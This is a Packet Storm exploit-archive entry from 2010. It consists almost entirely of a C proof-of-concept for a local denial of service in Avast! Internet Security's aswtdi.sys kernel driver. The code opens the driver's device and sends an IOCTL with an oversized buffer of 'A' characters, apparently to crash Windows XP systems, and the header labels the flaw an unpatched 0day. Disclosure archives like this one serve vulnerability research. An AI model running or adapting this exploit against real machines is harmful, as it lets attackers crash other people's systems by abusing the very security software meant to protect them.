Avast! Internet Security Denial Of Service

2010-11-05T00:00:00
ID PACKETSTORM:95506
Type packetstorm
Reporter Nikita Tarakanov
Modified 2010-11-05T00:00:00

Description

                                        
                                            `/*  
# Exploit Title: Avast! Internet Security aswtdi.sys 0day Local DoS PoC  
# Date: 2010-11-04  
# Author: Nikita Tarakanov (CISS Research Team)  
# Software Link: http://www.avast.com  
# Version: up to date, version 5.0.677, aswtdi.sys version 5.0.677  
# Tested on: Win XP SP3  
# CVE : CVE-NO-MATCH  
# Status : Unpatched  
*/  
#include <windows.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <io.h>  
#include <fcntl.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <errno.h>  
#include <share.h>  
  
  
int main(int argc, char **argv)  
{  
HANDLE hDevice;  
DWORD cb;  
void *buff;  
int len = 0;  
int pfh;  
int outlen = 0, inlen = 0;  
DWORD ioctl = 0x800515A8;  
char deviceName[] = "\\\\.\\aswTdi";  
  
if ( (hDevice = CreateFileA(deviceName,  
GENERIC_READ|GENERIC_WRITE,  
0,  
0,  
OPEN_EXISTING,  
0,  
NULL) ) != INVALID_HANDLE_VALUE )  
{  
printf("Device succesfully opened!\n");  
}  
else  
{  
printf("Error: Error opening device \n");  
return 0;  
}  
  
cb = 0;  
buff = malloc(0x2000);  
if(!buff){  
printf("malloc failed");  
return 0;  
}  
memset(buff, 'A', 0x2000-1);  
ioctl = 0x80000004;  
inlen = 4;  
  
outlen = 4;  
DeviceIoControl(hDevice, ioctl, (LPVOID)buff, inlen, (LPVOID)buff,  
outlen, &cb, NULL);  
free(buff);  
  
printf("done!");  
}  
  
`